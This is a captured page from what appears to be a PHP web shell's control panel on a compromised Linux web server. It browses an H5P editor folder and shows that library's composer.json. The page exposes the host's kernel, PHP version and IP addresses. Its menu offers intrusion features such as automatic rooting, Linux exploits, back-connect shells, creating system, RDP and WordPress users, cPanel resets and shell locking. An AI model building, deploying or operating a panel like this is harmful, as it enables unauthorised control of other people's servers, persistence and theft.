Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 172.69.6.176
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
aja /
public_html /
ead /
mod /
hvp /
editor /
[ HOME SHELL ]
Name
Size
Permission
Action
ckeditor
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
language
[ DIR ]
drwxr-xr-x
libs
[ DIR ]
drwxr-xr-x
scripts
[ DIR ]
drwxr-xr-x
styles
[ DIR ]
drwxr-xr-x
.gitignore
54
B
-rw-r--r--
README.md
168
B
-rw-r--r--
composer.json
928
B
-rw-r--r--
h5peditor-ajax.class.php
14.92
KB
-rw-r--r--
h5peditor-ajax.interface.php
1.38
KB
-rw-r--r--
h5peditor-file.class.php
6.08
KB
-rw-r--r--
h5peditor-storage.interface.ph...
3.05
KB
-rw-r--r--
h5peditor.class.php
26.92
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : composer.json
{ "name": "h5p/h5p-editor", "type": "library", "description": "H5P Editor functionality in PHP", "keywords": ["h5p","hvp","editor","interactive","content","quiz"], "homepage": "https://h5p.org", "license": "GPL-3.0", "authors": [ { "name": "Svein-Tore Griff With", "email": "with@joubel.com", "homepage": "http://joubel.com", "role": "CEO" }, { "name": "Frode Petterson", "email": "frode.petterson@joubel.com", "homepage": "http://joubel.com", "role": "Developer" } ], "require": { "php": ">=5.3.0" }, "autoload": { "files": [ "h5peditor.class.php", "h5peditor-file.class.php", "h5peditor-ajax.class.php", "h5peditor-storage.interface.php", "h5peditor-ajax.interface.php" ] } }
Close